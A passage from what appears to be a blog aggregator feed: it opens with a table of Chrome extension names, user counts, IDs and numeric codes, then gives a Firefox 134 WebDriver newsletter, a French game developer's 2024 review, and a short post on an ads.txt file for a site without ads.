FollowFox - IG Follower Export Tool (Email) 970 imoljjojcgjocfglobcbbhfbghpdjlfn 1, 2
chatgpt partner - Your AI Assistant 778 infgmecioihahiifibjcidpgkbampnel 4
Zombie Shooter Play 5,000 iohppfhpbicaflkcobkfikcjgbjjjdch 5
Adblock for YouTube & Chrome - All Block 400,000 jajikjbellknnfcomfjjinfjokihcfoi 1, 2, 3
AdBlocker - Ultimate Ads Blocker 1,000 jchookncibjnjddblpndekhkigpebmnn 1, 2, 3
Emoji Keyboard New 1,000 jddhjkckjlojegjdjlbobembgjoaobfc 6
Candy Match 3 Puzzle Games 2,000 jdffnpgoekmmkfgfflnpmonkldllfmbh 5
Genius PRO : Adblocker +Total Web Security 20,000 jdiegbdfmhkofahlnojgddehhelfmadj 3
Night Theme - Dark Mode 4,000,000 jhhjdfldilccfllhlbjdlhknlfbhpgeg 1, 2, 4
Jarvis AI: Chat GPT, Bing, Claude, Bard, BOT 10,000 kbhaffhbhcfmogkkbfanilniagcefnhi 1, 2
AI GPT 30,000 kblengdlefjpjkekanpoidgoghdngdgl 1
Dark Mode Chrome 300,000 kdllaademhdfbdhmphefcionnblmobff 1, 2, 4, 6
Pubg Wallpaper 1,000 kealimbjilfbnmolgombldemenlddfaa 5
Dark Shade 97 kfgpocchpfefpnecphkcjoammelpblce 1, 2
WA Contacts Extractor - wabulk.net 9,000 kfjafldijijoaeppnobnailkfjkjkhec 1
Video Downloader 10,000 kghcdbkokgjghlfeojcpeoclfnljkbdk 1, 2
ChatGPT of OpenAI for Google 10,000 kglajnlchongolikjlbcchdapioghjib 1, 2, 4, 6
Global Video & Audio Downloader 827 kglebmpdljhoplkjggohljkdhppbcenn 1, 2
Emoji keyboard online - copy&past your emoji. 1,000,000 kgmeffmlnkfnjpgmdndccklfigfhajen 1, 2, 4
Volume Booster - Increase sound 700,000 kjlooechnkmikejhimjlbdbkmmhlkkdd 1, 2, 4, 6
Yummi Fusion Game for Chrome 313 kknfaoaopblmapedlbhhicbnpdhlebff 5
Total Adblock 1,000 knnnjdihapcnbggclbihkkainodlapml 1, 2, 3, 7
Adblocker for Web 10,000 kojabglmkbdlpogbnenbdegoifgobklj 1, 2, 3, 4, 5
Simple Translator - Dictionary 800,000 koleblagfjjlhlkpacidojjnkhobeikd 1, 2, 3, 4, 6
Goku Ultra Instinct 40,000 kpehlpkidnkpifjmdgajdhhmcgdigjjn 6
Volume Booster - Increase Sound Effect 20,000 laldfbfjhaogodemgonegbingpmjldnh 1, 6
Zumba Mania Game - HTML5 Game 4,000 lckmeckmnopdeeelhglffajlfgodhoad 1
Comments Exporter 2,000 ldhjpljmgnggmkpcgaicmocfoefbcojl 1, 2
AdBlocker for LinkedIn® 100 leabdgiabfjhegkpomifpcfjfhlojcfh 3
Charm - Coupons, Promo Codes, & Discounts 366 lfbiblnhjmegapjfcbbodacjajhcgnbe 1, 2, 3, 5
Site Blocker: Stay focused & Block websites 2,000 lfbpllmokmhinnopfchemobgglipfini 1, 2
Youtube Ad Blocker 226 lfcgcabhmgenalfgamodjflggklmaldd 1, 2, 3
Video Downloader - Save m3u8 to MP4 10,000 lfdconleibeikjpklmlahaihpnkpmlch 1, 2
Contact Saver For WA & Download Group Phone Numbers - WPPME.COM 26 lfopjgadjgdlkjldhekplmeggobolnej 1, 6
ChatGenie for Chatgpt 8,000,000 lgfokdfepidpjodalhpbjindjackhidg 1, 2, 4
Mook: AI Tweet Generator With Chat GPT 259 lglmnbmfkbpfpbipjccjlkcgngekdhjk 1, 5
Anime Live Wallpapers 100,000 lgpgimkhbokanggfjjafplmjcdoclifl 6
ai logo creator 491 ljgimpibhgleapaoedngmcicjoifojea 1, 6
QR Code Generator 3,000,000 lkdokbndiffkmddlfpbjiokmfkafmgkm 1, 2, 4, 6
PDF Converter Online 10,000 lmgofgkjflllbmfdpamdjjmdjhohibpc 1, 2, 4
Video downloader by NNT 2,000 loiebadnnjhhmnphkihojemigfiondhf 1, 2, 6
WhichFont 75 lpamdogjnihpkoboakafmaiopljkhoib 5
Video Downloader Plus 100,000 lpcbiamenoghegpghidohnfegcepamdm 1, 2, 4
Summer Match 3 Game 613 lpfcolgfiohmgebkekkdakcoajfoeadn 5
Privacy Extension For WhatsApp Web - WABULK 90,000 mbcghjiodcjankhkllfohcgnckhdbkmi 1
Volume Booster + 800,000 mbdojfbhgijnafkihnkhllmhjhkmhedg 1, 2, 4, 6
Flux AI Image Generator 1,000 mblmjcogbjicpmhhjmpgjeiaophchpji 3
WA Group Number Exporter 5,000 mbmldhpfnohbacbljfnjnmhfmecndfjp 1, 5
Claude to Evernote 59 mekebjmippjiaajoaeeiemdcfngnnnkm 7
WA Number Checker - wabulk.net 8,000 meppipoogaadmolplfjchojpjdcaipgj 1
WA Number Checker 1,000 mgbpamnoiegnkologgggccldjenfchmc 1, 2
Translator - Click to Translate 451 mghganlaibcgnnooheoaebljgfbghpdl 1, 2, 4
ChatGPT Summary - summarize assistant 300,000 mikcekmbahpbehdpakenaknkkedeonhf 1, 2, 4, 6
Escape From School Game FEEP 2,000 mjkdllcbnonllpedjjmgdhkjnjmcigpo 5
Alfi Adventure Game 220 mkonckdeijcimlecklibjbnapmhnbpji 5
Allow Copy - Select & Enable Right Click 900,000 mmpljcghnbpkokhbkmfdmoagllopfmlm 1, 2
Save image to PDF 114 mpdpidnikijhgcbemphajoappcakdgok 5
Screensy - screen recording 3,000 mpiihicgfapopgaahidedijlddefkedc 1, 2
WhatsApp Salesforce integration 345 nacklnnkbcphbhgodnhfgnbdmobomlnm 5
Easy Ad Blocker 100,000 naffoicfphgmlgikpcmghdooejkboifd 3
Anime Girls Wallpaper 10,000 nahgmphhiadplbfoehklhedcbbieecak 5
PiP (Picture in picture) 800,000 nalkmonnmldhpfcpdlbdpljlaajlaphh 1, 2, 6
Vytal - Spoof Timezone, Geolocation & Locale 50,000 ncbknoohfjmcfneopnfkapmkblaenokb 1, 3, 5
Bass Booster Extreme - It Works! 10,000 ndhaplegimoabombidcdfogcnpmcicik 1, 2, 4
ProTranslator - Translator for All web 54 nemnbfdhbeigohoicapnbdecdlkcpmpj 1, 2, 4, 6
Adblock for Ytube 3,000 nendakennfmpoplpmpgnmcbpfabkibki 6
AI Image Generator - Text to Image Online 20,000 nfnkkmgbapopddmomigpnhcnffjdmfgo 1
Night Shift - Dark Theme for WEB 155 ngocaaiepgnlpdlpehhibnpmecaodfpk 1, 2, 4
Mad Shark HTML 5 Game 1,000 nhbckdjhkcjckhfgpmicgaiddbfdhhll 5
Screen Recorder 5,000 nhmaphcpolbbanpfhamgdpjlphbcnieh 1, 4
IgComment - IG Comments Export 545 nilbploiiciajeklaogbonjaejdjhfao 1
InReach - LinkedIn B2B Email Finder 1,000 nloekplnngjkjohmbfhmhjegijlnjfjk 5
Full Page Screenshot - Screen Capture 1,000 nmbngkjfkglbmmnlicoejhgaklphedcg 1, 2, 4
Exporter for Followers 400,000 nmnhoiehpdfllknopjkhjgoddkpnmfpa 1, 2
Flash Player - flash emulator 400,000 nohenbjhjbaleokplonjkbmackfkpcne 1, 2, 4, 6
Dark Mode Wallpapers 1,000 npmjehopohdlglmehokclpmbkgpfckcd 6
WhatsApp Audio & Voice Message to Text 112 npojienggkmiiemiolplijhfdmppacik 1, 6
Your Emoji Keyboard 1,000 obekkkgdekegaejajmdpaodefomoomfk 6
Adblock for Spotify - Skip ads on music 10,000 obiomemfgclpnflokpjjfokafbnoallb 1, 2
Manual Finder 2024 256 ocbfgbpocngolfigkhfehckgeihdhgll 5
Flash Player Enable - flash emulator swf 300,000 ocfjjghignicohbjammlhhoeimpfnlhc 1, 2
GT Cars Mega Ramp Game FEEP 630 ociihgpflooiebgncjgjkcaledmkhakk 5
Stick Panda Play Game 5,000 ocmbglodnmkcljocboijoemgceokifgg 5
Garena Free Fire Wallpaper 10,000 ocnnnfbblcadccdphieemnmbljdomdgl 5
Dictionary for Google Chrome - Synonyms, Definition 21 ocooohinghhdfcpfdonkjhhankdolpab 1, 3
Presto lead extractor for Bing Maps and OSM 300,000 oilholdcmnjkebdhokhaamalceecjbip 1, 2, 4
Dark Mode - Dark Theme for Chrome 60,000 okcnidefkngmnodelljeodakdlfemelg 1, 6
FastSave & Repost for Instagram 700,000 olenolhfominlkfmlkolcahemogebpcj 1, 2, 4, 6
ClaudeAI Copilot 449 olldnaaindiifeadpdmfggognmkofaib 1, 4, 5
Roblox Wallpaper 6,000 omamcjggpkjhgbkadieakplbieffjimf 5
Dark Reader for Chrome 10,000 omfeeokgnjnjcgdbppmnijlmdnpafmmp 1, 4
Browsec VPN - Free VPN for Chrome 6,000,000 omghfjlpggmjjaagoclmmobgdodcjboh 1, 2, 7
ChatGPT Sidebar 3,000 oopjmodaipafblnphackpcbodmgoggdo 1, 2, 3, 5
Music Equalizer - Improve Sound for everyone 900,000 paahdfldanmapppepgbflkhibebaeaof 1, 2, 4, 6
Space Pinball Game 968 pakghdcedniccgdfjjionnmoacelicmf 7
Find Font 2,000 pbeodbbpdamofbpkancdlfnegflmhkph 6
Web Client for Xiaohongshu 1,000 pcbppejbcaaoiaiddaglpphkmfkodhkn 1, 5
Classic Dark Theme - Night Mode 2,000,000 pdpfhanekfkeijhemmfbnnjffiblgefi 1, 2, 4, 6
Shopify Scraper - Shopify Store Scraper & spy 1,000 pehfmekejnhfofdjabaalbnanmpgjcdn 1, 2, 3
Screen Editor 869 pehmgdedmhpfophbaljpcloeaihhnkhk 6
Bulk WA Number Checker & Validator & Search & lookup 310 pepdpaiacpcgjoapmhehgmjcicninpgf 1, 6
Email Extractor 2,000 pgckgjnbljjlgbedbicefldnkpeehgdo 1, 3
Adblock for YouTube™ 30,000 pginoclcfbhkoomedcodiclncajkkcba 3, 4
Site Blocker - Block Site & Focus Mode 1,000,000 pgoeobojimoocdnilcajmjihiabcmabn 1, 2, 4, 5
Dark Mode - Midnight Chrome 1,000 pidmkmoocippkppbgebgjhnmgkhephlb 1, 2, 4, 5
Save Image As PNG 1,000 piigjafeabajlmjkcmcemimcoaekbjmh 1, 2
ChatGPT-The Future 2,000 pijagnpcnegcogimkghghdihobbeaicn 4, 6
Safe3 safe browsing 900,000 pimlkaibgdfmbenlhmbjllfkbcfhfnjg 1, 2
Fishing Frenzy Games 4,000 pkanjcjckofmachobaedghimjboglcjf 6
Fortnite Wallpapers 7,000 pnmfgeifakoehoojepggpigbkkfolbmk 6
Best Cursors - Bloom of Custom Cursor 100,000 pnpapokldhgeofbkljienpjofgjkafkm 1, 2, 4
Naruto Live Wallpaper 10,000 ppemmflajcphagebjphjfoggjcbmgpim 6

Firefox Developer ExperienceFirefox WebDriver Newsletter 134

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 134 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

In Firefox 134, after working on bug fixes and improvements in previous releases, Dan (temidayoazeez032) implemented a completely new WebDriver BiDi command: browser.getClientWindows. Read more about this new feature in the detailed WebDriver BiDi updates below.

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Feel free to join our chatroom if you can’t see a bug that appeals to you, we can probably find a good task to get you started 🙂

WebDriver BiDi

Implemented the browser.getClientWindows command

Thanks again to Dan (temidayoazeez032) for this contribution. The browser.getClientWindows command allows clients to retrieve information about the currently opened browser windows. This command does not take any parameter and will return a payload with a clientWindows property containing a list of browser.ClientWindowInfo objects.

The example below shows the output of the browser.getClientWindows command when 2 browser windows are opened.

-> {
  "method": "browser.getClientWindows",
  "params": {},
  "id": 2
}

<- {
  "type": "success",
  "id": 2,
  "result": {
    "clientWindows": [
      {
        "active": false,
        "clientWindow": "8caf6a5d-944a-4709-ad0f-694418e3d262",
        "height": 971,
        "state": "normal",
        "width": 1280,
        "x": 4,
        "y": 38
      },
      {
        "active": true,
        "clientWindow": "be7dc2ed-d9ba-41d9-b864-dd9a6fabb9bf",
        "height": 971,
        "state": "normal",
        "width": 1280,
        "x": 26,
        "y": 60
      }
    ]
  }
}

This command will be especially useful in upcoming releases when the browser.setClientWindowState command is implemented, in order to update the dimensions of specific windows.

Support for initiatorType and destination fields in network events

The network.RequestData present in all network events now includes two new fields: initiatorType and destination. They are both strings, defined in the fetch specification (see: initiator type, destination). The initiatorType allows to know what triggered the request, and the destination field to know how the response will be used. Both fields are strings, and you can refer to the fetch specification to learn about the various values that they might be set to.

As an example, if a CSS file defines a background-image property for an element pointing to a url(), the corresponding request will have initiatorType set to "css" and destination set to "image".

Bug fixes

Marionette

Install and uninstall addons on GeckoView

The Addon:Install and Addon:Uninstall commands are now available for GeckoView. This will make it easier to test extensions on the mobile versions of Firefox.

Added Private Browsing mode support to Addon:Install

The Addon:Install command can now be used to install extensions enabled in Private Browsing mode. Clients can pass an optional boolean allowPrivateBrowsing to Addon:Install. When true, the extension will be installed in Private Browsing mode.

Adrian GaudebertL'état de l'Adrian 2024

Une sortie de jeu, enfin un peu d'argent pour Arpentor Studio, et une fin d'année difficile : c'est l'heure du bilan de mon année 2024 !

Projets principaux

Arpentor Studio

Le bilan d'Arpentor Studio sur 2024 est mitigé : d'un côté, nous avons réussi à sortir notre premier jeu, Dawnmaker, et c'est un petit miracle. De l'autre, nous avons généré un chiffre d'affaire d'environ 9 000€, et c'est très, très loin d'être suffisant pour faire tourner une entreprise. Il y a eu malgré tout quelques bonnes nouvelles en fin d'année, qui ouvrent des perspectives pour 2025.

Reprenons dans l'ordre. La première moitié de l'année a été totalement centrée sur finir et sortir Dawnmaker. Il a fallut faire quelques démarches administratives pour ouvrir un compte Steam et créer une page pour le jeu. Faire des demandes de solde pour les deux aides que nous avions reçues en 2022 (la BPI) et 2023 (la région Auvergne-Rhône-Alpes). Et bien sûr faire la gestion courante de l'entreprise, remonter les factures, mettre à jour le budget, ce genre de choses. Comme l'année précédente, Arpentor Studio ne m'a pas demandé trop de temps de travail.

Le temps fort de 2024, ce fût bien évidemment la sortie de Dawnmaker, le 31 juillet. Comme prévu vu le nombre de wishlists que nous avions avant la sortie, le jeu est un échec commercial, avec environ 5 000€ de chiffre d'affaire le premier mois — c'est-à-dire, 5k€ qui sont réellement rentrés dans les caisses d'Arpentor Studio, mais sur lesquels on devra payer des impôts. En revanche, le jeu a été très bien accueilli par la critique sur Steam, avec un score de 93% de review positives. Je ne m'attendais pas à un tel score, et c'est une surprise qui fait du bien au moral. J'ai écrit un (long) billet de post-mortem de Dawnmaker que je vais publier courant janvier, dans lequel je reviens en détail sur tout ce qui touche au jeu.

Passée la sortie de Dawnmaker, il a fallut déterminer ce que nous allions faire d'Arpentor Studio. Alexis (mon associé) et moi avons décidé de ne pas continuer à travailler ensemble, et j'ai fait la proposition de lui racheter l'entreprise. Ce n'est pas encore acté mais nous avons trouvé un accord : Arpentor deviendra une entreprise unipersonnelle début 2025, dès que les démarches administratives seront faites. J'ai l'intention de garder l'entreprise et de continuer à sortir des jeux comme activité principale, avec peut-être de la prestation à droite à gauche pour faire entrer un peu d'argent.

Cependant, il s'est passé quelque chose de totalement inattendu en octobre : un éditeur m'a contacté pour reprendre en main la promotion de Dawnmaker ! C'est quelque chose qui n'arrive quasiment jamais, tant la sortie d'un jeu est le moment clé où il génère de l'argent. J'étais donc assez sceptique sur cette proposition, mais après deux mois de négociations, nous avons trouvé un accord ! J'ai donc le plaisir de vous annoncer que depuis le 12 décembre, Dawnmaker est sous la gestion de Acram Digital, éditeur polonais spécialisé dans les jeux de plateau numériques.

L'équipe d'Acram a repris en main la gestion et la promotion de Dawnmaker. Ils sont responsables de sa page Steam, ils l'ont ajouté à leurs différents bundles et outils de promotion, en échange de quoi ils prennent un pourcentage sur les ventes du jeu. Mais ils financent également le portage mobile du jeu, portage que je vais faire pendant les trois premiers mois de 2025. Dawnmaker devrait donc arriver sur vos téléphones portables au printemps ! Ce contrat est une excellente nouvelle pour Arpentor Studio et pour moi : ça fait rentrer de l'argent qui va permettre de stabiliser financièrement l'entreprise, ça me permettra de me payer un peu — ce qui n'est pas arrivé depuis plusieurs années — et ça va également me donner un peu plus de budget pour le développement de mon prochain jeu !

J'entame donc 2025 avec une situation plus stable qu'avant : Dawnmaker va continuer à faire entrer de l'argent, pas beaucoup mais pas beaucoup c'est toujours mieux que pas du tout, et j'ai un plan pour sortir un jeu dans l'année. Ça va être sportif, j'ai beaucoup de choses à faire et peu de temps pour les faire, mais j'ai la ferme intention de ne pas refaire la même erreur que sur Dawnmaker, à savoir passer deux ans et demi sur un jeu qui ne rapporte pas d'argent. Mon objectif pour 2025, c'est donc de faire un jeu en environ 6 mois, de le sortir, et d'espérer qu'il rapporte un peu plus que le précédent, juste assez pour que je puisse en faire un autre, et ainsi de suite. Et qui sait, peut-être qu'un jour j'en ferai un qui rapportera assez pour passer au stade supérieur ?

Dawnmaker

Ça y est : vous pouvez acheter Dawnmaker !!! ???? (Comment ? Vous ne l'avez pas encore fait ? Foncez ! )

En 2024, j'ai travaillé sur beaucoup de domaines autour du jeu :

  • Promotion — j'ai créé la page Steam du jeu, j'ai posté à de nombreuses reprises sur les réseaux sociaux, notamment reddit, j'ai envoyé des emails à des youtubeurs, j'ai rédigé plusieurs billets pour le blog et la newsletter, entre autres choses.
  • Game design — les quatre grands chantiers sur le jeu en 2024 ont été de rendre compréhensible le Smog (l'adversaire du joueur), d'ajouter un tutoriel, de finaliser la boucle de méta-progression en ajoutant une carte du monde et un marché, et de concevoir deux nouveaux personnages avec leurs decks et répertoires respectifs.
  • Programmation — il a fallu bien sûr implémenter tout ce que j'ai cité juste avant, mais également ajouter énormément de polish au jeu, des feedbacks et du juice, corriger des bugs, et améliorer plein de choses en se basant sur les retours des joueurs. J'ai d'ailleurs ajouté un formulaire dans le jeu pour que ceux-ci puissent facilement nous faire part de leurs commentaires.
  • Gestion de communauté — une fois le jeu sorti, nous avons reçu de nombreux commentaires de joueurs sur Steam et sur notre discord. J'ai répondu à autant de ces commentaires que possible, et j'ai aussi tenu au courant nos joueurs des mises à jour du jeu.

Nous avons sorti le jeu le 31 juillet, puis nous avons travaillé sur une mise à jour de contenu, dans laquelle nous avons ajouté plusieurs personnages jouables et plein de nouvelles cartes et bâtiments. On a sorti cette mise à jour le 7 octobre, avec l'intention que ça soit le dernier ajout de contenu du jeu. Depuis, j'ai publié une mise à jour mineure pour corriger des bugs et améliorer certains points frustrants. Je pensais que ça serait plus ou moins terminé pour Dawnmaker, mais non ! Comme je l'ai annoncé dans la section précédente, le jeu va sortir sur plateformes mobiles, j'ai donc encore plusieurs mois de travail pour implémenter le support des téléphones.

Malgré tout, c'est le résultat de plus de deux ans et demi de travail, avec deux personnes à temps plein et une dizaine d'autres qui ont participé ponctuellement. J'en suis ressorti épuisé, à la fois physiquement et mentalement. Les derniers mois de 2024 ont été laborieux pour moi, tant il était difficile de me remettre au travail, notamment dès qu'il s'agissait d'être créatif. Mais on a sorti un jeu, un jeu qui plait à une partie conséquente de son public, qui a fini par trouver, aussi incroyable que ça puisse être, un éditeur. Un jeu dont je suis très fier.

Le Grand Œuvre

Vous découvrez en exclusivité de nom de code de mon prochain jeu vidéo. Le Grand Œuvre, ou Magnum Opus, c'est le processus de création de la Pierre Philosophale, l'objectif ultime de l'alchimie. Et ça sera le thème de ce prochain jeu : vous y incarnerez un alchimiste qui, pour se soigner d'un poison mortel, cherche à créer la véritable Pierre Philosophale. Le jeu sera un deckbuilder solo, sans combat, à mi-chemin entre Dominion et Balatro. Il sera question de jouer ses cartes pour obtenir des ressources, améliorer ses caractéristiques, et utiliser une forge pour créer de nouvelles cartes et des pierres magiques. Le jeu aura une structure de roguelite : quand vous perdrez, vous devrez recommencer de zéro, mais à chaque fois avec quelques améliorations, de nouvelles cartes débloquées, une forge plus performante, etc.

Le jeu est actuellement en phase de conception, c'est-à-dire que j'ai écrit le document de vision (avec les piliers, le thème, la fantasy… ) et créé quelques prototypes pour valider le cœur du gameplay. J'attaque bientôt la préproduction, avec la création d'un prototype complet du jeu. Je vais pouvoir reprendre pas mal de choses que j'ai codées pour Dawnmaker, notamment l'éditeur de contenu, et je devrais donc pouvoir avancer assez rapidement sur ce jeu. Et il le faut, parce que mes deadlines sont serrées ! Le but, c'est d'avoir terminé le jeu entièrement en septembre de cette année. Dans 8 mois !

J'ai la chance d'avoir une petite équipe qui est motivée pour m'accompagner sur ce projet, deux artistes et un programmeur. J'ai hâte de vous montrer ce qu'on va créer ensemble ! Stay tuned!

Projets secondaires

Souls

Malheureusement, Souls est toujours en pause. Je l'ai ressorti le temps d'une partie cet été, pour me rappeler tous les défauts de la version actuelle, mais je n'ai pas pris le temps de retravailler dessus. Ça reste mon projet de cœur et j'ai bon espoir d'un jour me remettre dessus !

Blog

J'ai publié 7 articles sur mon blog en 2024, et j'en ai écrit un 8e qui n'est pas encore publié — le post-mortem de Dawnmaker, mon plus long article à ce jour avec plus de 7 000 mots. L'objectif de 6 articles publiés est donc atteint, et même dépassé ! La plupart de ces articles a fait double-emploi avec la newsletter, c'est du win-win.

Voici les articles que j'ai publiés cette année :

  1. L'état de l'Adrian 2023
  2. Dawnmaker a une page Steam ET un trailer
  3. Killing two birds with one deck in Dawnmaker
  4. The challenges of teaching a complex game
  5. The frustration of (never really) finishing Dawnmaker
  6. 18 days of selling Dawnmaker
  7. How much did Dawnmaker really cost?

J'ai trouvé un système qui fonctionne, maintenant il faut tenir ce rythme en 2025 !

Bourgade

Après Dawnmaker, j'ai voulu me remettre dans le bain de la création en reproduisant quelque chose que j'avais déjà fait en 2020 : une game jam en solo. Bon, ça n'a pas marché : la semaine en question, j'ai reçu un coup de fil d'un certain éditeur qui s'intéressait à un certain jeu… Mais si je n'ai pas réussi à me mettre à fond sur ce jeu pendant une semaine, j'ai tout de même continué par ci par là pendant un peu plus d'un mois, et j'ai produit un jeu, disons, jouable, à défaut d'autre chose. Je ne l'ai pas encore publié parce qu'il n'y a aucune explication nulle part, mais je compte prendre le temps de le mettre en ligne, ne serait-ce pour qu'il ne tombe pas dans l'oubli de mon disque dur.

Ça s'appelle Bourgade et c'est un jeu de construction de village incrémental. Vous construisez des bâtiments qui produisent des ressources en temps réel, et que vous pouvez améliorer. Plus ils montent de niveau, plus ils produisent, mais plus ils coûtent cher. J'ai ajouté là-dessus une carte du monde sur laquelle vous pouvez envoyer des soldats piller des oasis, des héros qui partent en aventure, et des philosophes qui produisent des points de culture, la ressource qui permet de gagner une partie. Le jeu manque de contenu et de profondeur dans les systèmes, et surtout d'explications, mais le cœur est là. Reste à voir si ce cœur est plaisant et trouve un public, et si ça vaut le coup de continuer à développer Bourgade. Réponse dès que je prends le temps de faire des playtests !

Autres jeux

J'ai complètement laissé de côté tous mes autres projets créatifs en 2024. Parmi les jeux dont j'ai parlé l'année dernière, celui de « Cube Light », inspiré par l'expérience d'un draft de Magic: The Gathering a le plus de potentiel, ou en tout cas, c'est celui sur lequel j'ai le plus envie de revenir. J'ai également plusieurs autres idées dans les tiroirs que j'aimerais prototyper, mais j'ai du mal à voir comment je vais faire ça vu le planning que je m'impose sur l'année à venir pour terminer et sortir Le Grand Œuvre. Qui sait, peut-être que j'arriverais à faire quelques pauses créatives ?

Mes recommandations de l'année

Voilà pour mon bilan de ce que j'ai fait en 2024 ! Il est l'heure de terminer ce billet sur une note plus légère, avec mes recommandations culturelles de l'année.

Mon jeu vidéo de l'année

Sans aucun conteste, Balatro est mon jeu de l'année. C'est un jeu incroyable qui réussit l'exploit d'avoir des systèmes parfaitement équilibrés. C'est une assiette en équilibre sur une aiguille.

Si vous n'en avez pas entendu parlé, Balatro est un roguelite de poker. Vous commencez chaque partie avec un deck de 52 cartes classiques (2 à 10, valet, dame, roi, as) et vous devez réussir à faire des scores de plus en plus élevés en faisant des figures de poker. Trois cartes de même valeur pour un brelan, cinq cartes de même famille pour une couleur, etc. Évidemment il y a un twist : vous obtiendrez au fur et à mesure de la partie des jokers, qui vont vous donner des bonus de points en fonction de nombreux paramètres. L'un vous donnera plus de jetons chaque fois que vous jouerez une paire, l'autre multipliera par 2 votre score si vous avez un carré, etc. Ajoutez à ça des cartes de tarot pour modifier les cartes de votre deck, des planètes pour améliorer le score de vos combinaisons, et plein d'autres choses encore, pour faire un jeu incroyable que je vous recommande chaudement.

Mon jeu de plateau de l'année

J'ai peu joué à des nouveaux jeux cette année, mais les deux que j'ai préférés, je les ai reçu pour Noël. Autant vous dire qu'au moment où j'écris ces mots, je n'ai pu y jouer beaucoup, mais c'est l'un d'eux que je nomme quand même : Legacy of Yu.

Legacy of Yu, c'est un jeu vidéo en jeu de plateau. C'est un jeu solo (mais on y joue ensemble avec ma compagne) avec une structure de roguelite : vous recommencez chaque partie de zéro, mais à chaque fois avec quelques changements. Au fil des parties, un livre des récits vous indique de retirer telle carte et d'ajouter telles autres, modifiant ce sur quoi vous pourrez tomber aux prochaines parties. On incarne un fonctionnaire chinois chargé de mettre fin aux crues dévastatrices du Fleuve Jaune. On y recrute des villageois qu'on pourra utiliser pour obtenir des ressources ou de la main d'œuvre, on affronte des bandits, et on doit creuser des canaux le long du fleuve avant que la crue ne nous rattrape. Le jeu se déroule en campagne, chaque nouvelle partie étant influencée par les précédentes, jusqu'à ce qu'on gagne 7 fois ou perde 7 fois.

Du haut de mes deux parties, je suis très fan des sensations du jeu. On construit son moteur de génération de ressources, on sent la pression constante de la crue et des bandits, on planifie son tour et on anticipe les suivants. Il y a beaucoup de choix, et les ajouts obtenus vont tantôt faciliter le jeu en nous donnant un pouvoir supplémentaire, tantôt le rendre plus difficile en ajoutant des événements négatifs ou des brigands plus puissants. J'étais sceptique de jouer à un jeu de plateau solo, tant la pratique est liée à son aspect social pour moi, mais ça marche vraiment très bien.

Ma BD de l'année

Je me rends compte en rédigeant ces recommandations que j'ai, en fait, simplement moins consommé d'œuvres culturelles en 2024. Au moment de choisir un jeu de plateau, j'ai pris le dernier auquel j'ai joué, et au moment de choisir une BD, je constate que j'en ai lu vraiment très peu cette année. Il y en a une que j'ai tout de même trouvée mieux que les autres : La Cuisine des Ogres – Trois Fois Morte.

C'est l'histoire d'une petite fille abandonnée qui se fait enlever par le Croque Mitaine. Elle en réchappe miraculeusement, mais se retrouve coincée dans le pays magique où vivent ogres, chats qui parlent, kraken et autres créatures mystiques. L'histoire est prenante et le dessin superbe. Ce n'est pas une BD très ambitieuse, mais elle fait très bien le plus important : raconter une belle histoire.

Mon livre de l'année

Le Dieu d'Automne et d'Hiver n'est pas le livre que j'ai préféré cette année — ce privilège revient à Je suis Pilgrim — mais c'est celui que j'ai le plus envie de recommander, pour trois raisons. D'abord, parce que c'est quand même une lecture que j'ai adorée : c'est de la bonne Fantasy, le personnage principal est attachant, l'histoire sur fond d'enquête policière est bien ficelée, et le système de magie, très soft, fonctionne parfaitement avec le reste sans qu'il n'y ait de deus ex machina ou autre ressort « TG c'est magique ».

La deuxième raison, c'est que c'est écrit par une autrice française, Pauline Sidre, qui monte en niveau. Le précédent roman que j'ai lu d'elle, Rocaille, était déjà très bien, mais avait quelques lacunes. Ici on sent que la qualité est montée d'un cran, et c'est très agréable.

Et enfin, c'est publié par Sillex, un petit éditeur qui cherche à faire mieux dans ce milieu difficile, notamment en rémunérant mieux les autrices et auteurs. L'occasion de soutenir des gens biens !

Conclusions sur l'année 2024

2024 se termine sur une note difficile. Il y a eu l’énorme fatigue après la sortie de Dawnmaker, cumulée avec trois mois chaotiques où se sont chamboulées réflexions sur le prochain jeu, négociations avec un éditeur, prototypage d'un nouveau jeu et vacances plus ou moins reposantes.

2025 s'ouvre sur un challenge important : apprendre de mes erreurs et faire mieux. Ma plus grosse frustration avec Dawnmaker, c'est d'avoir passé beaucoup trop longtemps dessus. Je compte sur moi pour ne pas reproduire ça avec Le Grand Œuvre, et le terminer en 8 mois. On en reparle tout au long de l'année ! D'ici là, merci encore de suivre mes aventures, prenez soin de vous, et à très vite.

Don Martiads.txt for a site with no ads

This site does not have programmatic ads on it.

But just in case, since there’s a lot of malarkey in the online advertising business, I’m putting up this file to let the advertisers know that if someone sold you an ad and claimed it ran on here, you got burned.

That’s the ads.txt file for this site. The format is defined in a specification from the IAB Tech Lab (PDF). The important part is the last line. The placeholder is how you tell the tools that are supposed to be checking this stuff that you don’t have ads.

In other news, selling info on US citizens to North Korean murder robots is illegal now so we’ve got that going for us which is nice. See Justice Department Issues Final Rule Addressing Threat Posed by Foreign Adversaries’ Access to Americans’ Sensitive Personal Data

Related

Rachel explains Web page annoyances that I don’t inflict on you here in a handy list of web antipatterns. Removing more of these could be a good start to making a less frustrating, more accessible, higher performing site.

More useful things to check for security and performance: Securing your static website with HTTP response headers by Matt Hobbs. I have some of these set already but it’s helpful to have them all in one place. A browser can do a lot of stuff that a blog like this one won’t use, so safer to tell it not to.

Chris Coyier suggest that a list of Slash Pages could be a good list of blogging ideas. (That is a good idea. I made a list at /slashes and will fill it in. Ads.txt is technically not a page I guess since it’s just text but I’m counting it.)

Elie Berreby follows up on his search engine that’s forgotten how to search post with a long look at Search engines think I plagiarized my own content! My Hacker News Case Study. One of many parts that interests me about this whole issue is the problem of how much more money certain companies can make when returning a page on a sketchy infringing site than on the original. Typically an original content site is able to get a better ad deal than an illegal site that has to settle for scraps and leave more of the ad revenue for Google.

